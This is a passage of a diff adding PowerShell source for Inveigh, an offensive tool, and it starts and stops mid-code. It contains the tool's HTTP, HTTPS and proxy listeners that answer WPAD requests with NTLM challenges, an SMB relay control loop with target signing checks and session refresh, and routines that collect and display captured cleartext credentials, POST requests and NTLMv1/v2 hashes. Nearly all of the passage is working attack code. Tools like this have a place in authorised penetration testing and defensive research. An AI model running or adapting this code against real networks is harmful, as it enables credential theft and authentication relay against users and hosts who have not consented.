+ $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
+ $HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
+ $HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
+
+ if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close)
+ {
+ $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
+ }
+
+ $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20))
+ $packet_HTTPResponse.Add("HTTPResponse_StatusCode",$HTTP_response_status_code + [Byte[]](0x20))
+ $packet_HTTPResponse.Add("HTTPResponse_ResponsePhrase",$HTTP_response_phrase + [Byte[]](0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_Server",[Byte[]](0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_TimeStamp",[Byte[]](0x44,0x61,0x74,0x65,0x3a,0x20) + $HTTP_timestamp + [Byte[]](0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_ContentLength",$HTTP_header_content_length + [Byte[]](0x0d,0x0a))
+
+ if($HTTP_header_authenticate -and $HTTP_header_authenticate_data)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_AuthenticateHeader",$HTTP_header_authenticate + $HTTP_header_authenticate_data + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_header_content_type)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_ContentType",$HTTP_header_content_type + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_header_cache_control)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_send)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
+ $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
+ $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
+ $HTTP_stream.Flush()
+ }
+
+ Start-Sleep -m 10
+ $HTTP_request_raw_URL_old = $HTTP_request_raw_URL
+ $HTTP_client_handle_old = $HTTP_client.Client.Handle
+
+ if($HTTP_client_close)
+ {
+
+ if($proxy_listener)
+ {
+ $HTTP_client.Client.Close()
+ }
+ else
+ {
+ $HTTP_client.Close()
+ }
+
+ }
+
+ }
+ else
+ {
+
+ if($HTTP_data_available -or !$HTTP_reset_delay -or $HTTP_reset_delay_stopwatch.Elapsed -ge $HTTP_reset_delay_timeout)
+ {
+ $HTTP_client.Close()
+ $HTTP_client_close = $true
+ $HTTP_reset_delay = $false
+ }
+ else
+ {
+ Start-Sleep -m 100
+ }
+
+ }
+
+ }
+
+ $HTTP_client.Close()
+ start-sleep -s 1
+ $HTTP_listener.Server.blocking = $false
+ Start-Sleep -s 1
+ $HTTP_listener.Server.Close()
+ Start-Sleep -s 1
+ $HTTP_listener.Stop()
+}
+
+# Control Relay Loop ScriptBlock
+$control_relay_scriptblock =
+{
+ param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime,$SigningCheck)
+
+ function SigningCheck
+ {
+ $target_list = $inveigh.target_list
+
+ ForEach($target_entry in $target_list)
+ {
+ $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
+ $SMB_relay_socket.Client.ReceiveTimeout = 5000
+ $SMB_relay_socket.Connect($target_entry,"445")
+
+ if(!$SMB_relay_socket.connected)
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding") > $null
+ }
+ else
+ {
+ SMBRelayChallenge $SMB_relay_socket $null '$SMB1' $true > $null
+ }
+
+ }
+
+ if(!$inveigh.target_list)
+ {
+ StopInveigh "empty target list"
+ }
+
+ }
+
+ function OutputQueueLoop
+ {
+
+ while($inveigh.output_queue.Count -gt 0)
+ {
+
+ if($inveigh.console_output)
+ {
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ }
+
+ function StopInveigh
+ {
+ param ([String]$exit_message)
+
+ if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
+ {
+
+ try
+ {
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
+
+ ForEach($certificate in $certificates)
+ {
+ $certificate_store.Remove($certificate)
+ }
+
+ $certificate_store.Close()
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]") > $null
+ }
+
+ }
+
+ if($inveigh.DNS_list.Count -gt 0)
+ {
+
+ foreach($DNS_host in $inveigh.DNS_list)
+ {
+
+ if($DNS_host.StartsWith("1,"))
+ {
+
+ $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
+
+ if($DNS_update -eq "[+] DNS update successful")
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) removed")
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) remove failed")
+ }
+
+ }
+
+ }
+
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
+ }
+
+ if($inveigh.relay_running)
+ {
+ Start-Sleep -S 1
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $exit_message") > $null
+ OutputQueueLoop
+ Start-Sleep -S 1
+ $inveigh.relay_running = $false
+ }
+
+ if($inveigh.running)
+ {
+ Start-Sleep -S 1
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $exit_message") > $null
+ OutputQueueLoop
+ Start-Sleep -S 1
+ $inveigh.running = $false
+ }
+
+ $inveigh.HTTPS = $false
+ }
+
+ if($SigningCheck -eq 'Y')
+ {
+ $SigningCheck = 'N'
+ SigningCheck
+ }
+
+ if($RunTime)
+ {
+ $control_timeout = New-TimeSpan -Minutes $RunTime
+ $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
+ while($inveigh.relay_running)
+ {
+
+ while($inveigh.output_queue.Count -gt 0)
+ {
+
+ if($inveigh.console_output)
+ {
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay)
+ {
+ Start-Sleep -S 5
+ StopInveigh "disabled relay"
+ }
+
+ if($RunTime)
+ {
+
+ if($control_stopwatch.Elapsed -ge $control_timeout)
+ {
+ StopInveigh "run time"
+ }
+
+ }
+
+ if($inveigh.file_output -and -not $inveigh.control)
+ {
+
+ while($inveigh.log_file_queue.Count -gt 0)
+ {
+ $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
+ $inveigh.log_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.NTLMv1_file_queue.Count -gt 0)
+ {
+ $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
+ $inveigh.NTLMv1_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.NTLMv2_file_queue.Count -gt 0)
+ {
+ $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
+ $inveigh.NTLMv2_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.cleartext_file_queue.Count -gt 0)
+ {
+ $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
+ $inveigh.cleartext_file_queue.RemoveAt(0)
+ }
+
+ while($inveigh.form_input_file_queue.Count -gt 0)
+ {
+ $inveigh.form_input_file_queue[0]|Out-File $inveigh.form_input_out_file -Append
+ $inveigh.form_input_file_queue.RemoveAt(0)
+ }
+
+ }
+
+ if(!$inveigh.console_output -and $ConsoleQueueLimit -ge 0)
+ {
+
+ while($inveigh.console_queue.Count -gt $ConsoleQueueLimit -and !$inveigh.console_output)
+ {
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ Start-Sleep -m 5
+ }
+
+ }
+
+# Session Refresh Loop ScriptBlock
+$session_refresh_scriptblock =
+{
+ param ($SessionRefresh)
+
+ while($inveigh.relay_running)
+ {
+
+ if($inveigh.session_socket_table.Count -gt 0)
+ {
+ $session = 0
+
+ while($session -le $inveigh.session_socket_table.Count)
+ {
+ $session_timespan = New-TimeSpan $inveigh.session_list[$session]."Last Activity" $(Get-Date)
+
+ if($inveigh.session_socket_table[$session].Connected -and $inveigh.session_lock_table[$session] -eq 'open' -and $session_timespan.Minutes -ge $SessionRefresh)
+ {
+ $inveigh.session_lock_table[$session] = 'locked'
+ $SMB_client = $inveigh.session_socket_table[$session]
+ $SMB_client_stream = $SMB_client.GetStream()
+ $SMB_session_ID = $inveigh.session_table[$session]
+ $SMB2_message_ID = $inveigh.session_message_ID_table[$session]
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_client_receive = New-Object System.Byte[] 1024
+ $SMB_path = "\\" + $inveigh.session_socket_table[$session].Client.RemoteEndpoint.Address.IPaddressToString + "\IPC$"
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ #$packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+
+ try
+ {
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed")
+ }
+
+ $inveigh.session_lock_table[$Session] = 'open'
+ $inveigh.session_list[$Session] | Where-Object {$_."Last Activity" = Get-Date -format s}
+ $inveigh.session_message_ID_table[$Session] = $SMB2_message_ID
+ }
+
+ $session++
+ }
+
+
+ }
+
+ Start-Sleep -m 5
+ }
+
+}
+
+ # HTTP Listener Startup Function
+function HTTPListener
+{
+ $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
+ $HTTPS_listener = $false
+ $proxy_listener = $false
+ $HTTP_runspace.Open()
+ $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $HTTP_powershell = [PowerShell]::Create()
+ $HTTP_powershell.Runspace = $HTTP_runspace
+ $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $HTTP_powershell.AddScript($packet_functions_scriptblock) > $null
+ $HTTP_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
+ $Command).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPResetDelay).AddArgument(
+ $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($SessionLimit).AddArgument($SessionPriority).AddArgument(
+ $Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
+ $HTTP_powershell.BeginInvoke() > $null
+}
+
+# HTTPS Listener Startup Function
+function HTTPSListener
+{
+ $HTTPS_runspace = [RunspaceFactory]::CreateRunspace()
+ $HTTPS_listener = $true
+ $proxy_listener = $false
+ $HTTPS_runspace.Open()
+ $HTTPS_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $HTTPS_powershell = [PowerShell]::Create()
+ $HTTPS_powershell.Runspace = $HTTPS_runspace
+ $HTTPS_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($packet_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
+ $Command).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPResetDelay).AddArgument(
+ $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($SessionLimit).AddArgument($SessionPriority).AddArgument(
+ $Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
+ $HTTPS_powershell.BeginInvoke() > $null
+}
+
+# Proxy Listener Startup Function
+function ProxyListener
+{
+ $proxy_runspace = [RunspaceFactory]::CreateRunspace()
+ $HTTPS_listener = $false
+ $proxy_listener = $true
+ $proxy_runspace.Open()
+ $proxy_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $proxy_powershell = [PowerShell]::Create()
+ $proxy_powershell.Runspace = $proxy_runspace
+ $proxy_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $proxy_powershell.AddScript($packet_functions_scriptblock) > $null
+ $proxy_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
+ $Command).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPResetDelay).AddArgument(
+ $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
+ $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Service).AddArgument($SMB_version).AddArgument($SessionLimit).AddArgument($SessionPriority).AddArgument(
+ $Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
+ $WPADResponse) > $null
+ $proxy_powershell.BeginInvoke() > $null
+}
+
+# Control Relay Startup Function
+function ControlRelayLoop
+{
+ $control_relay_runspace = [RunspaceFactory]::CreateRunspace()
+ $control_relay_runspace.Open()
+ $control_relay_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $control_relay_powershell = [PowerShell]::Create()
+ $control_relay_powershell.Runspace = $control_relay_runspace
+ $control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $control_relay_powershell.AddScript($packet_functions_scriptblock) > $null
+ $control_relay_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
+ $RelayAutoExit).AddArgument($RunTime).AddArgument($SigningCheck) > $null
+ $control_relay_powershell.BeginInvoke() > $null
+}
+
+# Session Refresh Startup Function
+function SessionRefreshLoop
+{
+ $session_refresh_runspace = [RunspaceFactory]::CreateRunspace()
+ $session_refresh_runspace.Open()
+ $session_refresh_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+ $session_refresh_powershell = [PowerShell]::Create()
+ $session_refresh_powershell.Runspace = $session_refresh_runspace
+ $session_refresh_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $session_refresh_powershell.AddScript($packet_functions_scriptblock) > $null
+ $session_refresh_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
+ $session_refresh_powershell.AddScript($session_refresh_scriptblock).AddArgument($SessionRefresh) > $null
+ $session_refresh_powershell.BeginInvoke() > $null
+}
+
+# HTTP Server Start
+if($HTTP -eq 'Y')
+{
+ HTTPListener
+ Start-Sleep -m 50
+}
+
+# HTTPS Server Start
+if($HTTPS -eq 'Y')
+{
+ HTTPSListener
+ Start-Sleep -m 50
+}
+
+# Proxy Server Start
+if($Proxy -eq 'Y')
+{
+ ProxyListener
+ Start-Sleep -m 50
+}
+
+# Control Relay Loop Start
+ControlRelayLoop
+
+# Session Refresh Loop Start
+if($SessionRefresh -gt 0)
+{
+ SessionRefreshLoop
+}
+
+# Console Output Loop
+try
+{
+
+ if($inveigh.console_output)
+ {
+
+ if($ConsoleStatus)
+ {
+ $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
+ :console_loop while($inveigh.relay_running -and $inveigh.console_output)
+ {
+
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Warning($inveigh.console_queue[0])
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
+ {
+
+ if($ConsoleOutput -eq 'Y')
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ }
+
+ if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
+ {
+
+ if($inveigh.cleartext_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique cleartext captures:" + $inveigh.newline)
+ $inveigh.cleartext_list.Sort()
+
+ foreach($unique_cleartext in $inveigh.cleartext_list)
+ {
+ if($unique_cleartext -ne $unique_cleartext_last)
+ {
+ Write-Output($unique_cleartext + $inveigh.newline)
+ }
+
+ $unique_cleartext_last = $unique_cleartext
+ }
+
+ Start-Sleep -m 5
+ }
+ else
+ {
+ Write-Output("[+] [$(Get-Date -format s)] No cleartext credentials have been captured" + $inveigh.newline)
+ }
+
+ if($inveigh.POST_request_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique POST request captures:" + $inveigh.newline)
+ $inveigh.POST_request_list.Sort()
+
+ foreach($unique_POST_request in $inveigh.POST_request_list)
+ {
+ if($unique_POST_request -ne $unique_POST_request_last)
+ {
+ Write-Output($unique_POST_request + $inveigh.newline)
+ }
+
+ $unique_POST_request_last = $unique_POST_request
+ }
+
+ Start-Sleep -m 5
+ }
+
+ if($inveigh.NTLMv1_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv1_list.Sort()
+
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ {
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ {
+ Write-Output($unique_NTLMv1 + $inveigh.newline)
+ }
+
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
+
+ $unique_NTLMv1_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("[*] [$(Get-Date -format s)] Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
+
+ foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
+ {
+ Write-Output($NTLMv1_username + $inveigh.newline)
+ }
+
+ Start-Sleep -m 5
+ }
+ else
+ {
+ Write-Output("[+] [$(Get-Date -format s)] No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+ }
+
+ if($inveigh.NTLMv2_list.Count -gt 0)
+ {
+ Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv2_list.Sort()
+
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+ {
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output($unique_NTLMv2 + $inveigh.newline)
+ }
+
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
+
+ $unique_NTLMv2_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("[*] [$(Get-Date -format s)] Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+
+ foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
+ {
+ Write-Output($NTLMv2_username + $inveigh.newline)
+ }
+
+ }
+ else
+ {
+ Write-Output("[+] [$(Get-Date -format s)] No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
+ }
+
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
+ }
+
+ if($inveigh.console_input)
+ {
+
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
+ }
+
+ }
+
+ Start-Sleep -m 5
+ }
+
+ }
+
+}
+finally
+{
+
+ if($Tool -eq 2)
+ {
+ $inveigh.relay_running = $false
+ }
+
+}
+
+}
+#End Invoke-InveighRelay
+
+function Stop-Inveigh
+{
+<#
+.SYNOPSIS
+Stop-Inveigh will stop all running Inveigh functions.
+#>
+
+if($inveigh)
+{
+
+ if($inveigh.running -or $inveigh.relay_running)
+ {
+
+ if($inveigh.DNS_list.Count -gt 0)
+ {
+
+ foreach($DNS_host in $inveigh.DNS_list)
+ {
+
+ if($DNS_host.StartsWith("1,"))
+ {
+
+ $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
+
+ if($DNS_update -eq "[+] DNS update successful")
+ {
+ $output = "[+] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " removed"
+ Write-Output $output
+ }
+ else
+ {
+ $output = "[-] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " remove failed"
+ Write-Warning $output
+ }
+
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($output) > $null
+ }
+
+ }
+
+ }
+
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
+ }
+
+ if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
+ {
+
+ try
+ {
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
+
+ ForEach($certificate in $certificates)
+ {
+ $certificate_store.Remove($certificate)
+ }
+
+ $certificate_store.Close()
+ }
+ catch
+ {
+ $output = "[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]"
+
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($output) > $null
+ }
+
+ Write-Warning $output
+ }
+
+ }
+
+ if($inveigh.relay_running)
+ {
+ $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
+
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($output) > $null
+ }
+
+ Write-Output $output
+ $inveigh.relay_running = $false
+ }
+
+ if($inveigh.running)
+ {
+ $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
+
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($output) > $null
+ }
+
+ Write-Output $output
+ $inveigh.running = $false
+ }
+
+ $inveigh.HTTPS = $false
+ Start-Sleep -S 5
+ }
+ else
+ {
+ Write-Output "[-] There are no running Inveigh functions"
+ }
+
+}
+
+}
+
+function Get-Inveigh
+{
+<#
+.SYNOPSIS
+Get-Inveigh will get stored Inveigh data from memory.
+
+.PARAMETER Console
+Get queued console output. This is also the default if no parameters are set.
+
+.PARAMETER DNS
+Get added DNS host records.
+
+.PARAMETER DNSFailed
+Get failed DNS host record adds.
+
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
+
+.PARAMETER Log
+Get log entries.
+
+.PARAMETER Cleartext
+Get captured cleartext credentials.
+
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
+
+.PARAMETER NTLMv1
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv1Unique
+Get the first captured NTLMv1 challenge/response for each unique account.
+
+.PARAMETER NTLMv1Usernames
+Get IP addresses and usernames for captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2Unique
+Get the first captured NTLMv2 challenge/response for each unique account.
+
+.PARAMETER NTLMv2Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER POSTRequest
+Get captured POST requests.
+
+.PARAMETER POSTRequestUnique
+Get unique captured POST request.
+#>
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][Switch]$Cleartext,
+ [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+ [parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$DNS,
+ [parameter(Mandatory=$false)][Switch]$DNSFailed,
+ [parameter(Mandatory=$false)][Switch]$Learning,
+ [parameter(Mandatory=$false)][Switch]$Log,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+ [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+ [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+ [parameter(Mandatory=$false)][Switch]$POSTRequest,
+ [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
+ [parameter(Mandatory=$false)][Switch]$Session,
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+ )
+
+ if($Console -or $PSBoundParameters.Count -eq 0)
+ {
+
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ else
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+ Write-Warning $inveigh.console_queue[0]
